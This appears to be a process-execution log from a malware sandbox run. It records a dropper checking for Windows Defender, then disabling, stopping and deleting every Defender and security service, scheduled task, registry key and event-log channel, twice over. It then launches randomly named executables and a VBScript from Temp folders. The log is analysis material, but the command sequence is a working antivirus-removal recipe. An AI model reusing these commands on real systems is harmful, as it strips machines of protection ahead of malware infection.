chcp.com chcp 65001
2988reg.exe reg query "HKU\S-1-5-19"
1964reg.exe reg add "HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Themes\Personalize" /v "AppsUseLightTheme" /t reg_dword /d 0 /f
2208chcp.com chcp 65001
3028reg.exe reg query "HKU\S-1-5-19"
800reg.exe reg add "HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Themes\Personalize" /v "AppsUseLightTheme" /t reg_dword /d 0 /f
3044mode.com Mode 79,49
2068cmd.exe C:\Windows\system32\cmd.exe /c ver
2244reg.exe reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA"
2484find.exe find /i "0x0"
2508tasklist.exe tasklist
2640reg.exe reg query "HKLM\System\CurrentControlSet\Services\WinDefend"
2960reg.exe reg query "HKLM\System\CurrentControlSet\Services\MDCoreSvc"
3052reg.exe reg query "HKLM\System\CurrentControlSet\Services\WdNisSvc"
1384reg.exe reg query "HKLM\System\CurrentControlSet\Services\Sense"
2392reg.exe reg query "HKLM\System\CurrentControlSet\Services\wscsvc"
2420reg.exe reg query "HKLM\System\CurrentControlSet\Services\SgrmBroker"
2544reg.exe reg query "HKLM\System\CurrentControlSet\Services\SecurityHealthService"
2848reg.exe reg query "HKLM\System\CurrentControlSet\Services\webthreatdefsvc"
2784reg.exe reg query "HKLM\System\CurrentControlSet\Services\webthreatdefusersvc"
2760reg.exe reg query "HKLM\System\CurrentControlSet\Services\WdNisDrv"
2108reg.exe reg query "HKLM\System\CurrentControlSet\Services\WdBoot"
2224reg.exe reg query "HKLM\System\CurrentControlSet\Services\WdFilter"
2480reg.exe reg query "HKLM\System\CurrentControlSet\Services\SgrmAgent"
1796reg.exe reg query "HKLM\System\CurrentControlSet\Services\MsSecWfp"
2844reg.exe reg query "HKLM\System\CurrentControlSet\Services\MsSecFlt"
2952reg.exe reg query "HKLM\System\CurrentControlSet\Services\MsSecCore"
1504reg.exe reg query HKLM\System\CurrentControlset\Services\WdFilter
1064reg.exe reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion" /v "ProductName"
2600find.exe find /i "Windows 7"
2788cmd.exe C:\Windows\system32\cmd.exe /S /D /c" ver "
1404findstr.exe findstr /c:"6.1.7601"
2804sc.exe sc config "WinDefend" start= disabled
812sc.exe sc stop "WinDefend"
1256sc.exe sc delete "WinDefend"
1576reg.exe reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
1168sc.exe sc config "MDCoreSvc" start= disabled
2064sc.exe sc stop "MDCoreSvc"
3080sc.exe sc delete "MDCoreSvc"
3132reg.exe reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
3180sc.exe sc config "WdNisSvc" start= disabled
3224sc.exe sc stop "WdNisSvc"
3272sc.exe sc delete "WdNisSvc"
3320reg.exe reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
3368sc.exe sc config "Sense" start= disabled
3412sc.exe sc stop "Sense"
3460sc.exe sc delete "Sense"
3508reg.exe reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
3556sc.exe sc config "wscsvc" start= disabled
3600sc.exe sc stop "wscsvc"
3648sc.exe sc delete "wscsvc"
3696reg.exe reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
3744sc.exe sc config "SgrmBroker" start= disabled
3832sc.exe sc stop "SgrmBroker"
3892sc.exe sc delete "SgrmBroker"
3956reg.exe reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
4004sc.exe sc config "SecurityHealthService" start= disabled
4048sc.exe sc stop "SecurityHealthService"
3076sc.exe sc delete "SecurityHealthService"
2296reg.exe reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
3164sc.exe sc config "webthreatdefsvc" start= disabled
3220sc.exe sc stop "webthreatdefsvc"
3284sc.exe sc delete "webthreatdefsvc"
3364reg.exe reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
3424sc.exe sc config "webthreatdefusersvc" start= disabled
3540sc.exe sc stop "webthreatdefusersvc"
3596sc.exe sc delete "webthreatdefusersvc"
3676reg.exe reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
740sc.exe sc config "WdNisDrv" start= disabled
3808sc.exe sc stop "WdNisDrv"
1332sc.exe sc delete "WdNisDrv"
1376reg.exe reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
3896sc.exe sc config "WdBoot" start= disabled
4020sc.exe sc stop "WdBoot"
4092sc.exe sc delete "WdBoot"
2300reg.exe reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
3160sc.exe sc config "WdFilter" start= disabled
3276sc.exe sc stop "WdFilter"
3408sc.exe sc delete "WdFilter"
3528reg.exe reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
3632sc.exe sc config "SgrmAgent" start= disabled
3728sc.exe sc stop "SgrmAgent"
3748sc.exe sc delete "SgrmAgent"
2000reg.exe reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
4076sc.exe sc config "MsSecWfp" start= disabled
3124sc.exe sc stop "MsSecWfp"
3312sc.exe sc delete "MsSecWfp"
3456reg.exe reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
3536sc.exe sc config "MsSecFlt" start= disabled
1668sc.exe sc stop "MsSecFlt"
936sc.exe sc delete "MsSecFlt"
3968reg.exe reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
3880sc.exe sc config "MsSecCore" start= disabled
3288sc.exe sc stop "MsSecCore"
3500sc.exe sc delete "MsSecCore"
3464reg.exe reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
3924schtasks.exe schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
3252schtasks.exe schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
3660schtasks.exe schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
3784schtasks.exe schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
3400schtasks.exe schtasks /Delete /TN "Microsoft\Windows\AppID\SmartScreenSpecific" /f
1308reg.exe reg delete "HKLM\Software\Microsoft\Windows Defender" /f
3452reg.exe reg delete "HKLM\Software\Microsoft\Windows Defender Security Center" /f
4064reg.exe reg delete "HKLM\Software\Microsoft\Windows Advanced Threat Protection" /f
3428reg.exe reg delete "HKLM\Software\Microsoft\Windows Security Health" /f
3904reg.exe reg delete "HKLM\System\CurrentControlset\Control\WMI\Autologger\DefenderApiLogger" /f
4128reg.exe reg delete "HKLM\System\CurrentControlset\Control\WMI\Autologger\DefenderAuditLogger" /f
4172reg.exe reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
4216reg.exe reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
4260reg.exe reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
4304reg.exe reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
4348reg.exe reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
4440reg.exe reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
4484reg.exe reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\VolumeCaches\Windows Defender" /f
4528reg.exe reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC" /f
4672reg.exe reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\NIS-Driver-WFP/Diagnostic" /f
4716reg.exe reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" /f
4764reg.exe reg delete "HKLM\Software\Microsoft\SystemSettings\SettingId\SystemSettings_WindowsDefender_UseWindowsDefender" /f
4816reg.exe reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel\NameSpace\{D8559EB9-20C0-410E-BEDA-7ED416AECC2A}" /f
4868sc.exe sc start VMTools
4912sc.exe sc start VMTools
4960lYvr05n.exe "C:\Users\test22\AppData\Local\Temp\10015950101\lYvr05n.exe"
2588FuaxeNA.exe "C:\Users\test22\AppData\Local\Temp\10017910101\FuaxeNA.exe"
3792OE1vOqz.exe "C:\Users\test22\AppData\Local\Temp\10018450101\OE1vOqz.exe"
1316dDthTIC.exe "C:\Users\test22\AppData\Local\Temp\10019230101\dDthTIC.exe"
4392chcp.com chcp 65001
4420reg.exe reg query "HKU\S-1-5-19"
4500reg.exe reg add "HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Themes\Personalize" /v "AppsUseLightTheme" /t reg_dword /d 0 /f
4568chcp.com chcp 65001
4976reg.exe reg query "HKU\S-1-5-19"
2944reg.exe reg add "HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Themes\Personalize" /v "AppsUseLightTheme" /t reg_dword /d 0 /f
3952mode.com Mode 79,49
4116cmd.exe C:\Windows\system32\cmd.exe /c ver
4148reg.exe reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA"
4344find.exe find /i "0x0"
4228tasklist.exe tasklist
4600reg.exe reg query "HKLM\System\CurrentControlSet\Services\WinDefend"
4616reg.exe reg query "HKLM\System\CurrentControlSet\Services\MDCoreSvc"
4880reg.exe reg query "HKLM\System\CurrentControlSet\Services\WdNisSvc"
4788reg.exe reg query "HKLM\System\CurrentControlSet\Services\Sense"
4860reg.exe reg query "HKLM\System\CurrentControlSet\Services\wscsvc"
4212reg.exe reg query "HKLM\System\CurrentControlSet\Services\SgrmBroker"
4264reg.exe reg query "HKLM\System\CurrentControlSet\Services\SecurityHealthService"
4644reg.exe reg query "HKLM\System\CurrentControlSet\Services\webthreatdefsvc"
2132reg.exe reg query "HKLM\System\CurrentControlSet\Services\webthreatdefusersvc"
4408reg.exe reg query "HKLM\System\CurrentControlSet\Services\WdNisDrv"
4944reg.exe reg query "HKLM\System\CurrentControlSet\Services\WdBoot"
4988reg.exe reg query "HKLM\System\CurrentControlSet\Services\WdFilter"
5108reg.exe reg query "HKLM\System\CurrentControlSet\Services\SgrmAgent"
4512reg.exe reg query "HKLM\System\CurrentControlSet\Services\MsSecWfp"
2128reg.exe reg query "HKLM\System\CurrentControlSet\Services\MsSecFlt"
4888reg.exe reg query "HKLM\System\CurrentControlSet\Services\MsSecCore"
4104reg.exe reg query HKLM\System\CurrentControlset\Services\WdFilter
4468reg.exe reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion" /v "ProductName"
4596find.exe find /i "Windows 7"
5012cmd.exe C:\Windows\system32\cmd.exe /S /D /c" ver "
4640findstr.exe findstr /c:"6.1.7601"
4144sc.exe sc config "WinDefend" start= disabled
4928sc.exe sc stop "WinDefend"
4532sc.exe sc delete "WinDefend"
4140reg.exe reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
5160sc.exe sc config "MDCoreSvc" start= disabled
5204sc.exe sc stop "MDCoreSvc"
5296sc.exe sc delete "MDCoreSvc"
5348reg.exe reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
5396sc.exe sc config "WdNisSvc" start= disabled
5540sc.exe sc stop "WdNisSvc"
5588sc.exe sc delete "WdNisSvc"
5636reg.exe reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
5684sc.exe sc config "Sense" start= disabled
5760sc.exe sc stop "Sense"
5808sc.exe sc delete "Sense"
5856reg.exe reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
5928sc.exe sc config "wscsvc" start= disabled
5972sc.exe sc stop "wscsvc"
6020sc.exe sc delete "wscsvc"
6068reg.exe reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
6116sc.exe sc config "SgrmBroker" start= disabled
5140sc.exe sc stop "SgrmBroker"
5224sc.exe sc delete "SgrmBroker"
5300reg.exe reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
5556sc.exe sc config "SecurityHealthService" start= disabled
5620sc.exe sc stop "SecurityHealthService"
5680sc.exe sc delete "SecurityHealthService"
5788reg.exe reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
5872sc.exe sc config "webthreatdefsvc" start= disabled
5920sc.exe sc stop "webthreatdefsvc"
6000sc.exe sc delete "webthreatdefsvc"
6024reg.exe reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
5124sc.exe sc config "webthreatdefusersvc" start= disabled
5156sc.exe sc stop "webthreatdefusersvc"
5388sc.exe sc delete "webthreatdefusersvc"
5632reg.exe reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
5776sc.exe sc config "WdNisDrv" start= disabled
5852sc.exe sc stop "WdNisDrv"
5968sc.exe sc delete "WdNisDrv"
6096reg.exe reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
108sc.exe sc config "WdBoot" start= disabled
5560sc.exe sc stop "WdBoot"
6108sc.exe sc delete "WdBoot"
5836reg.exe reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
5884sc.exe sc config "WdFilter" start= disabled
5792sc.exe sc stop "WdFilter"
676sc.exe sc delete "WdFilter"
1708reg.exe reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
5860sc.exe sc config "SgrmAgent" start= disabled
6004sc.exe sc stop "SgrmAgent"
5984sc.exe sc delete "SgrmAgent"
5192reg.exe reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
6032sc.exe sc config "MsSecWfp" start= disabled
6172sc.exe sc stop "MsSecWfp"
6228sc.exe sc delete "MsSecWfp"
6276reg.exe reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
6324sc.exe sc config "MsSecFlt" start= disabled
6368sc.exe sc stop "MsSecFlt"
6416sc.exe sc delete "MsSecFlt"
6464reg.exe reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
6512sc.exe sc config "MsSecCore" start= disabled
6556sc.exe sc stop "MsSecCore"
6604sc.exe sc delete "MsSecCore"
6652reg.exe reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
6700schtasks.exe schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
6768schtasks.exe schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
6816schtasks.exe schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
6864schtasks.exe schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
6912schtasks.exe schtasks /Delete /TN "Microsoft\Windows\AppID\SmartScreenSpecific" /f
6960reg.exe reg delete "HKLM\Software\Microsoft\Windows Defender" /f
7008reg.exe reg delete "HKLM\Software\Microsoft\Windows Defender Security Center" /f
7064reg.exe reg delete "HKLM\Software\Microsoft\Windows Advanced Threat Protection" /f
7108reg.exe reg delete "HKLM\Software\Microsoft\Windows Security Health" /f
7152reg.exe reg delete "HKLM\System\CurrentControlset\Control\WMI\Autologger\DefenderApiLogger" /f
6188reg.exe reg delete "HKLM\System\CurrentControlset\Control\WMI\Autologger\DefenderAuditLogger" /f
6244reg.exe reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
6308reg.exe reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
6384reg.exe reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
6444reg.exe reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
6508reg.exe reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
6576reg.exe reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
6636reg.exe reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\VolumeCaches\Windows Defender" /f
6696reg.exe reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC" /f
5328reg.exe reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\NIS-Driver-WFP/Diagnostic" /f
6764reg.exe reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" /f
6772reg.exe reg delete "HKLM\Software\Microsoft\SystemSettings\SettingId\SystemSettings_WindowsDefender_UseWindowsDefender" /f
6884reg.exe reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel\NameSpace\{D8559EB9-20C0-410E-BEDA-7ED416AECC2A}" /f
6944sc.exe sc start VMTools
7000sc.exe sc start VMTools
7096207216b66f.exe "C:\Users\test22\AppData\Local\Temp\10020490101\207216b66f.exe"
524839d8455be9.exe "C:\Users\test22\AppData\Local\Temp\10020500101\39d8455be9.exe"
5932a3e8f181a3.tmp "C:\Users\test22\AppData\Local\Temp\is-6FDHC.tmp\a3e8f181a3.tmp" /SL5="$200180,19201980,844800,C:\Users\test22\AppData\Local\Temp\10020510101\a3e8f181a3.exe"
6540dDthTIC.exe "C:\Users\test22\AppData\Local\Temp\10020520101\dDthTIC.exe"
6720lYvr05n.exe "C:\Users\test22\AppData\Local\Temp\10020530101\lYvr05n.exe"
5408cmd.exe cmd.exe /c 68140be001524.vbs
6504amnew.exe "C:\Users\test22\AppData\Local\Temp\10020550101\amnew.exe"
68443v57I.exe C:\Users\test22\AppData\Local\Temp\IXP000.TMP\3v57I.exe
1484explorer.exe C:\Windows\Explorer.EXE
1452